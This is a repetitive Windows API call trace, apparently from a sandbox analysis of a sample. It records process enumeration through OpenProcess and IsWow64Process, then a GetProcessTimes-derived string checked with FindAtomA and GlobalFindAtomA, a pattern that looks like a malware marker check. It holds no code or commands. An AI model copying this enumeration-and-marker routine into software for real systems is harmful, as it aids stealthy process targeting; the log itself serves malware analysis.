	[0118.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.200] CloseHandle (hObject=0x698) returned 1
	[0118.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.200] CloseHandle (hObject=0x698) returned 1
	[0118.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.200] CloseHandle (hObject=0x698) returned 1
	[0118.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.201] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.201] CloseHandle (hObject=0x698) returned 1
	[0118.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.203] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.203] CloseHandle (hObject=0x698) returned 1
	[0118.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.203] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.203] CloseHandle (hObject=0x698) returned 1
	[0118.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.203] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.203] CloseHandle (hObject=0x698) returned 1
	[0118.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.204] CloseHandle (hObject=0x698) returned 1
	[0118.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.204] CloseHandle (hObject=0x698) returned 1
	[0118.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.204] CloseHandle (hObject=0x698) returned 1
	[0118.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.204] CloseHandle (hObject=0x698) returned 1
	[0118.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.205] CloseHandle (hObject=0x698) returned 1
	[0118.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.205] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.205] CloseHandle (hObject=0x698) returned 1
	[0118.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.205] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.205] CloseHandle (hObject=0x698) returned 1
	[0118.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.205] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.205] CloseHandle (hObject=0x698) returned 1
	[0118.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.206] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.206] CloseHandle (hObject=0x698) returned 1
	[0118.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.206] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.206] CloseHandle (hObject=0x698) returned 1
	[0118.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.206] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.206] CloseHandle (hObject=0x698) returned 1
	[0118.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.206] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.206] CloseHandle (hObject=0x698) returned 1
	[0118.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.206] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.206] CloseHandle (hObject=0x698) returned 1
	[0118.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.207] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.207] CloseHandle (hObject=0x698) returned 1
	[0118.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.207] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.207] CloseHandle (hObject=0x698) returned 1
	[0118.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.208] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.208] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.208] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.208] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.208] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.208] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.209] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.209] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.209] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.209] CloseHandle (hObject=0x698) returned 1
	[0118.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.209] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.210] CloseHandle (hObject=0x698) returned 1
	[0118.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.210] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.210] CloseHandle (hObject=0x698) returned 1
	[0118.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.210] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.210] CloseHandle (hObject=0x698) returned 1
	[0118.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.246] CloseHandle (hObject=0x698) returned 1
	[0118.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.247] CloseHandle (hObject=0x698) returned 1
	[0118.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.247] CloseHandle (hObject=0x698) returned 1
	[0118.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.247] CloseHandle (hObject=0x698) returned 1
	[0118.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.248] CloseHandle (hObject=0x698) returned 1
	[0118.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.248] CloseHandle (hObject=0x698) returned 1
	[0118.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.248] CloseHandle (hObject=0x698) returned 1
	[0118.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.248] CloseHandle (hObject=0x698) returned 1
	[0118.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.249] CloseHandle (hObject=0x698) returned 1
	[0118.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.251] CloseHandle (hObject=0x698) returned 1
	[0118.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.251] CloseHandle (hObject=0x698) returned 1
	[0118.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.251] CloseHandle (hObject=0x698) returned 1
	[0118.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.252] CloseHandle (hObject=0x698) returned 1
	[0118.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.252] CloseHandle (hObject=0x698) returned 1
	[0118.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.252] CloseHandle (hObject=0x698) returned 1
	[0118.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.253] CloseHandle (hObject=0x698) returned 1
	[0118.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.253] CloseHandle (hObject=0x698) returned 1
	[0118.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.253] CloseHandle (hObject=0x698) returned 1
	[0118.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.253] CloseHandle (hObject=0x698) returned 1
	[0118.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.254] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.254] CloseHandle (hObject=0x698) returned 1
	[0118.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.254] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.254] CloseHandle (hObject=0x698) returned 1
	[0118.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.254] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.254] CloseHandle (hObject=0x698) returned 1
	[0118.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.254] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.254] CloseHandle (hObject=0x698) returned 1
	[0118.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.254] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.255] CloseHandle (hObject=0x698) returned 1
	[0118.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.255] CloseHandle (hObject=0x698) returned 1
	[0118.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.255] CloseHandle (hObject=0x698) returned 1
	[0118.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.255] CloseHandle (hObject=0x698) returned 1
	[0118.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.255] CloseHandle (hObject=0x698) returned 1
	[0118.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.256] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.256] CloseHandle (hObject=0x698) returned 1
	[0118.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.256] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.256] CloseHandle (hObject=0x698) returned 1
	[0118.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.256] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.256] CloseHandle (hObject=0x698) returned 1
	[0118.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.257] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.257] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.257] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.257] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.257] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.258] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.258] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.258] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.258] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.258] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.258] CloseHandle (hObject=0x698) returned 1
	[0118.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.258] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.258] CloseHandle (hObject=0x698) returned 1
	[0118.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.259] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.259] CloseHandle (hObject=0x698) returned 1
	[0118.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.259] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.259] CloseHandle (hObject=0x698) returned 1
	[0118.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.294] CloseHandle (hObject=0x698) returned 1
	[0118.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.295] CloseHandle (hObject=0x698) returned 1
	[0118.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.295] CloseHandle (hObject=0x698) returned 1
	[0118.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.295] CloseHandle (hObject=0x698) returned 1
	[0118.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.296] CloseHandle (hObject=0x698) returned 1
	[0118.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.296] CloseHandle (hObject=0x698) returned 1
	[0118.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.296] CloseHandle (hObject=0x698) returned 1
	[0118.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.296] CloseHandle (hObject=0x698) returned 1
	[0118.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.299] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.299] CloseHandle (hObject=0x698) returned 1
	[0118.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.299] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.299] CloseHandle (hObject=0x698) returned 1
	[0118.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.299] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.299] CloseHandle (hObject=0x698) returned 1
	[0118.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.300] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.300] CloseHandle (hObject=0x698) returned 1
	[0118.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.300] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.300] CloseHandle (hObject=0x698) returned 1
	[0118.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.300] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.300] CloseHandle (hObject=0x698) returned 1
	[0118.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.300] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.300] CloseHandle (hObject=0x698) returned 1
	[0118.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.300] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.300] CloseHandle (hObject=0x698) returned 1
	[0118.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.301] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
